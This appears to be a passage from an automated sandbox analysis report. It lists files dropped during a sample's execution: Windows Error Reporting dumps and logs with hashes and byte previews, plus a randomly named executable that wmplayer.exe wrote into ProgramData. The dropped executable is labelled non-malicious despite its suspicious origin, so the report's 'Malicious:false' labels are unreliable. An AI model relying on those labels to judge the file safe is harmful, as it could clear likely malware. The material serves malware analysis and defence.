                                                                                                                                                                                          Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER85A6.tmp.dmp

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                          File Type:Mini DuMP crash report, 16 streams, Thu Mar 28 09:25:53 2024, 0x1205a4 type
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):2019287
                                                                                                                                                                                          Entropy (8bit):2.5847697712995497
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:12288:kpPh0ai329nyZUqJA4gfQVop0T92iZgyWNu:SPh0aEuuUqfgfQVk
                                                                                                                                                                                          MD5:C8E68C0744F41B34B6249B0947D24BDB
                                                                                                                                                                                          SHA1:882A2FFCAE19EC1E7E6D97AAF0FEECC9A161B0A3
                                                                                                                                                                                          SHA-256:77AF6998A867EB4EBF701502E64561DE76EE5240E65B11A3319B8B782B5D97C8
                                                                                                                                                                                          SHA-512:EB8527182F8A6F79B30412CCF957E4FF5FE63A7B0BFABD866DD4276342894DEC1AEC6C410849DA37BE21A6D0A2BDFF5C970779B04B9171B97F4BBB77F95BBFD7
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:MDMP..a..... ........7.f............D...........(~..d.......$............!..........T4...,..........l.......8...........T...........0{...T.....................................................................................................eJ......P.......Lw......................T.......\....7.f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER8BD1.tmp.WERInternalMetadata.xml

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):9030
                                                                                                                                                                                          Entropy (8bit):3.712641936786437
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:192:R6l7wVeJGH39T6Yrs6/CYgmfZj/prw89bP22T2ffFm:R6lXJ239T6YQ6/lgmfN/P22CfQ
                                                                                                                                                                                          MD5:27AF30B34C654E7423254FB734847F4C
                                                                                                                                                                                          SHA1:CE2636A13FD644EA01FB28669B23A3F2BEE409CF
                                                                                                                                                                                          SHA-256:D36CA0281B7C2B1CFAC6C5FB4A8F1C5DD5C3A172BE8E6EF3D06AB5665B3BEFBE
                                                                                                                                                                                          SHA-512:333B37728AD1B145C3BEEE656D7A889AE4ADC4D1A6F641397740554F9D022EA1053AD6C94E410FB30C57A19C1535E0F31E083B93D52B105423486D6DBFDDB983
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.9.0.8.<./.P.i.

                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER8BF1.tmp.xml

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):4791
                                                                                                                                                                                          Entropy (8bit):4.491421770214888
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:48:cvIwWl8zssJg771I9mOSWpW8VYrYm8M4JKE6Fuyq8vwEfd0yYnd:uIjfqI7Zw7V/JzNWNfd0yYnd
                                                                                                                                                                                          MD5:D366F92DE4A4A6C453B4E4AE77981AD3
                                                                                                                                                                                          SHA1:7F5B025BCF915FAC49C613F0FA455BF85501A550
                                                                                                                                                                                          SHA-256:F8410C2A19AB9242286E1A027EBC28664BDA996B086EB645A0E67BCDA82329B4
                                                                                                                                                                                          SHA-512:4C7DDF1754863D92E3E3D9569D80BF9FECA69B4B84C83C5EC736E6F6D0F6CCEBEA70ED78009B1A42175E1A56C3E3B314BB53D0F79C956473B31305BEA4EE13EC
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="254908" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER8C01.tmp.csv

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):79014
                                                                                                                                                                                          Entropy (8bit):3.0223916058603995
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:1536:r6COoGBjk6Jx2p1N2jojy2WpoNrOvB0wio:r6COoGBjk6Jx2p1N2jojy2WporOvB0wn
                                                                                                                                                                                          MD5:5F17DE90D1896B1A78658DB8144FDF37
                                                                                                                                                                                          SHA1:B71C3478573F42734B1606392C05DA3EAFEFCB1F
                                                                                                                                                                                          SHA-256:D2A82562F59662196BEC6CD647ECF595F5AD44CB79AB19456FFD28449F7FC9C9
                                                                                                                                                                                          SHA-512:A99544D798B73A823B320D3FCBD0D991767845BA842B162D1631AD3514BB9DF0A43428E5994AB6638EE44C9CF9125E47C23A5D07EC449F1101192AA2AA68F0C6
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER8C50.tmp.txt

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):13340
                                                                                                                                                                                          Entropy (8bit):2.68461746517202
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:96:TiZYWRGMWxOkYWYoWPHw+YEZk8tHipMFbdGwL+wBaDb5M6hMI403:2ZDRG/hfavBaDb5M6hL403
                                                                                                                                                                                          MD5:0D40E21B5FADDA02641A53AB4226EAFC
                                                                                                                                                                                          SHA1:8CF39B878D09E8F3221F5F1697DDBCFFE2B84FC5
                                                                                                                                                                                          SHA-256:616CAE95C0940984273FA3F4CD5A9D8A5738941FD9226D22FE672163A337A94B
                                                                                                                                                                                          SHA-512:CF8EB7190A6E81D15BBA540DD71E7FE77BEE94E16DA97FF399A43B676AA82096150E1AC76DBD4AC4C63569DFB315D56FFFB8339005D53B30A8C929D5FA87494B
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER95BE.tmp.dmp

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                          File Type:Mini DuMP crash report, 16 streams, Thu Mar 28 09:27:03 2024, 0x1205a4 type
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1998440
                                                                                                                                                                                          Entropy (8bit):2.5085039242385943
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:6144:LGyiweOqMdActdeG0Dnu3n2kLYXv3QwRhXXNBuvfyfoHCThhcmqZjCoOn1spGgEb:viGEOM/QohHAC9kj3Qgx+ZgyvN+q
                                                                                                                                                                                          MD5:42EE8872D9D4FCA067FD06EE721BFF2C
                                                                                                                                                                                          SHA1:5B021DA69507A43CFE8C61FB2C32A9008D9D3E2E
                                                                                                                                                                                          SHA-256:A5AD1C76502A85BD881D2F859F935BB41F2F34A234329CDF438CAB05A5785A05
                                                                                                                                                                                          SHA-512:6B98B5583563AD57C76A29455E5A3BA45CC9AF8E710A5C9C8D36396B4A50CBA96979B9FAAFB5B6E17248F94744DB63166DF2EFDA32E6C494F37FA970011A2E21
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:MDMP..a..... ........7.f............D............}..d.......$... ........!..D........-..^,..........l.......8...........T............z..P...........`...........L...............................................................................eJ.............Lw......................T............7.f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER9D12.tmp.WERInternalMetadata.xml

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):9012
                                                                                                                                                                                          Entropy (8bit):3.715285661722071
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:192:R6l7wVeJtlg9Rl6YrT6gigmfqqDprT89bvQGpfa1Wm:R6lXJPg9z6Yv69gmfqqqvQofkf
                                                                                                                                                                                          MD5:B56357AD76E4DF08B394294A3C972CCC
                                                                                                                                                                                          SHA1:6AABE9AC6C1C1D17CA82E39330E33C9190C88592
                                                                                                                                                                                          SHA-256:52A5CBC429BB1C46DBE946BC6C54ADA21C691B6AE544200152F289A651D59C14
                                                                                                                                                                                          SHA-512:E6FB7B76BDACABCA0335BECDCDF4FA0479C006E26FB2C3E398F83B7D514224D6A1778B604D8D983D3F6E7C851FF454734FBA336E71B85EAC63265B1F9E4A70D3
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.7.8.8.<./.P.i.

                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER9D33.tmp.xml

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):4736
                                                                                                                                                                                          Entropy (8bit):4.494431224706483
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:48:cvIwWl8zs7Jg771I9mOSWpW8VYNYm8M4JuAFhyq85zRIdnQOnd:uIjfVI7Zw7VpJHMIdnQOnd
                                                                                                                                                                                          MD5:E5A84076C72E75CEF30C2A43C7ECA026
                                                                                                                                                                                          SHA1:EB983EE0F018160E844B355ACABB1DFDEFE615C8
                                                                                                                                                                                          SHA-256:5A9F260456D36044640AB71BC0A5BB31084089B80243568CAE54F280956ABE6E
                                                                                                                                                                                          SHA-512:316C8F1537B001AF309FEB6DA1E37A98ACBD4E6C81BBA4A2A6691CC16AAF2C894C9392EFAAA0EE530645CA6EF18B51A0D6DDB960E61353CDB7BB2D44E42804F5
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="254909" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER9D58.tmp.csv

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):81766
                                                                                                                                                                                          Entropy (8bit):3.02049387892657
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:1536:9kYjD/ByTLSOJj+ouh8LVQp2rYJBGai+z+8T+yT+Uva+G+MoDbg22:9kYjD/ByTLSOJj+ouh8LVQp2rYJwai+s
                                                                                                                                                                                          MD5:E403B6092A192C5DBC4542BAC44297D2
                                                                                                                                                                                          SHA1:3A99D6922CF53CBC25EE27BEFF96189FB9969E4B
                                                                                                                                                                                          SHA-256:5CAB87963263DB5659BF28BE0FB7B9C45486F4E7B0D48B938B18B13DE207517E
                                                                                                                                                                                          SHA-512:C27D86EBC732F17892FDF0E3013A6D1FE94D5E271C60A48E11E07861DA6C523103FD62D55F860E105008CA42633A4395BC9747E71235D4F659D5B5E82E9CD75E
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER9DA7.tmp.txt

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):13340
                                                                                                                                                                                          Entropy (8bit):2.6867515279111696
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:96:TiZYWom6RgsYFYpWmHvYEZoAtHiiMCbj5wASKe0FaqbOMnEeI703:2ZDSZSXuH7FaqbOMnEp703
                                                                                                                                                                                          MD5:8169433C35E0B71E18A94B756764A183
                                                                                                                                                                                          SHA1:1B62237ADD666FE5C0E985CC93E09EF8394CE2F3
                                                                                                                                                                                          SHA-256:0512A3B7B5194CF4A074BB26925175DB5BD4D835C96D69EBF3613354C4028A79
                                                                                                                                                                                          SHA-512:772A355B2503B681A628AFE44A14D0C1AB63E17F9AC5D63AC1C92E91E3E007095BED8630051A1C816C84AFBB1521288D991343AA5DCF00C968BEF742709DC6DD
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                                          C:\ProgramData\xlffyhztkvzk\pkiwizgebqxq.exe

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Program Files\Windows Media Player\wmplayer.exe
                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):171008
                                                                                                                                                                                          Entropy (8bit):6.419077616064984
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3072:9IV3QSwkohYkQr0jeLwJr95rJolNAzyP+msVK0Zz:9IV32YQqLwhHrWsOP+5VT
                                                                                                                                                                                          MD5:89DCD2D4C0EC638AADC00D3530E07E1D
                                                                                                                                                                                          SHA1:53DB931EBA71BD6FB14A4B0F4D0E601963C09299
                                                                                                                                                                                          SHA-256:C3252A14845280B1A938B4DEF08F04690EA36E4454D0BEBEECC4E31A9C30D742
                                                                                                                                                                                          SHA-512:BAD5D21A28F69633D13A372DA4C2FA4B9586C30E4B43BEC361FAC1BE6BDED7C49FE684C65F77B60E54346C899E2CFB36FCB291AB3536335D92F3C6AC2AEDEA41
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........g....................................................................Rich............................PE..d...c.h..........."............................@.....................................b....`.......... .......................................>..x.......hY...`..................<....9..T............................0..............(1..0...$=..`....................text............................... ..`.rdata.......0......."..............@..@.data........P.......:..............@....pdata.......`.......<..............@..@.didat..@....p.......>..............@....rsrc...hY.......Z...@..............@..@.reloc..<...........................@..B................................................................................................................................................................................................................................

                                                                                                                                                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                          File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 4770 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock, 0x1 compression
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):4770
                                                                                                                                                                                          Entropy (8bit):7.946747821604857
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:96:9/nBu64pydcvOHRUfu0xK1bQYMRSRNoYmxYvk56sHMZhh4m:9/nBuP2cGxUfu6K1bpWJ6vfh4m
                                                                                                                                                                                          MD5:1BFE591A4FE3D91B03CDF26EAACD8F89
                                                                                                                                                                                          SHA1:719C37C320F518AC168C86723724891950911CEA
                                                                                                                                                                                          SHA-256:9CF94355051BF0F4A45724CA20D1CC02F76371B963AB7D1E38BD8997737B13D8
